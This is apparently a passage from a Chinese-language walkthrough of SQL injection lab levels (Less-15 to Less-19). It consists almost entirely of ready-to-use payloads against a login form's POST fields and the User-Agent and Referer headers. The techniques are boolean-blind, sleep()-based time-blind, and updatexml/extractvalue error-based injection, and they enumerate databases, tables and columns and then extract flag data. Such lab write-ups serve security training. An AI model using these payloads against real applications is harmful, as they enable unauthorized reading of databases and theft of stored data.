8.查看表中的flag列中的数据
uname=1" and updatexml(1,concat(0x7e,(select flag from r1lPpzMz limit 0,1),0x7e),1)#&passwd=a&submit=Submit
less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)
本题使用bool注入
1.判断是否存在注入
uname=a'&passwd=a&submit=Submit
错误登录
uname=a' or 1=1#&passwd=a&submit=Submit
正确登录 => 存在注入
2.判断参数类型
uname=1 or 1=1#&passwd=a&submit=Submit
错误登录
uname=1' or 1=1#&passwd=a&submit=Submit
正确登录 => 字符型
3.进行参数闭合
uname=1' or 1=1#&passwd=a&submit=Submit
正确登录
uname=1' or 1=2#&passwd=a&submit=Submit
错误登录 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
uname=1' or 1=1 order by 2 #&passwd=a&submit=Submit
正确登录
uname=1' or 1=1 order by 1 #&passwd=a&submit=Submit
错误登录 => 有3列
5.因为没有回显,所以使用布尔盲注,判断数据库的长度
uname=1' or length(database())=8 #&passwd=a&submit=Submit
6.查看所在数据库
uname=1' or left(database(),1)='s' #&passwd=a&submit=Submit
7.查看数据库的表
uname=1' or ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n #&passwd=a&submit=Submit
a是从0开始第几个表,b从1开始为第几个字符,n是ASCII所对应的十进制数
8.查看0tUdVIPy表中的列
uname=1' or ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name ="0tUdVIPy" limit 0,1),1,1))>1 #&passwd=a&submit=Submit
9.查看表中的flag列中的数据
uname=1' or ascii(substr((select flag from 0tUdVIPy limit 0,1),1,1))>1 #&passwd=a&submit=Submit
Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)
本题使用延迟注入
1.判断是否存在注入
uname=a") or sleep(3) #&passwd=a&submit=Submit
延迟回显 => 存在注入
2.判断参数类型
uname=1 or sleep(3) #&passwd=a&submit=Submit
正常回显 => 字符型
3.进行参数闭合
uname=a") or sleep(3) #&passwd=a&submit=Submit
延迟回显 => 闭合成功
4.猜测数据库长度
uname=1") or if(length(database())=7,1,sleep(5)) #&passwd=a&submit=Submit
延迟回显
uname=1") or if(length(database())=8,1,sleep(5)) #&passwd=a&submit=Submit
正常回显 => 有8位
6.查看所在数据库
uname=1") or If(ascii(substr(database(),1,1))=114,1,sleep(5)) #&passwd=a&submit=Submit
延迟回显
uname=1") or If(ascii(substr(database(),1,1))=115,1,sleep(5)) #&passwd=a&submit=Submit
正常回显 => 第一位ascii=115
7.查看数据库的表
uname=1") or If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>1,1,sleep(3)) #&passwd=a&submit=Submit
8.查看users表中的列
uname=1") or If(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='ENR4qOJL' limit 0,1),1,1))>1,1,sleep(3)) #&passwd=a&submit=Submit
9.查看表中的flag列中的数据
uname=1") or If(ascii(substr((select flag from ENR4qOJL limit 0,1),1,1))>1,1,sleep(3)) #&passwd=a&submit=Submit
Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)
在本关中,我们要知道用户名,对密码处的值进行操作,才能进行下面的操作。
1.判断是否存在注入
uname=admin&passwd=a'&submit=Submit
报错回显 => 存在注入
2.判断参数类型
uname=admin&passwd=1 and 1=1&submit=Submit
正确回显 => 字符型
4.查看所在数据库
uname=admin&passwd=1' and updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit
5.查看数据库的表
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#&submit=Submit
6.查看ZULae9ih表中的列
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='ZULae9ih' limit 1,1),0x7e),1)#&submit=Submit
7.查看表中的flag列中的数据
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select flag from ZULae9ih limit 3,1),0x7e),1)#&submit=Submit
8.显示不完全
uname=admin&passwd=1' and updatexml(1,concat(0x7e,right((select flag from ZULae9ih limit 3,1) ,31),0x7e),1) #&submit=Submit
Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)
需要登录成功
1.判断是否存在注入
User-Agent: '
2.查看所在数据库和数据库版本
User-Agent: ' and extractvalue(1,concat(0x7e,database(),0x7e)) and '
3.查看数据库的表
' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)) and '
4.查看B8COTOy3表中的列
' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='B8COTOy3' limit 1,1),0x7e)) and '
5.查看表中的flag列中的数据
' and extractvalue(1,concat(0x7e,right((select flag from B8COTOy3 limit 3,1),31),0x7e)) and '
Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)
1.判断是否存在注入
Referer:'
2.查看所在数据库和数据库版本
Referer:' and extractvalue(1,concat(0x7e,database(),0x7e)) and '
3.查看数据库的表
Referer:' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)) and '
4.查看9J7dKBsE表中的列
Referer:' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='9J7dKBsE' limit 1,1),0x7e)) and '
5.查看表中的flag列中的数据
Referer:' and extractvalue(1,concat(0x7e,right((select flag from 9J7dKBsE limit 3,1),31),0x7e)) and '
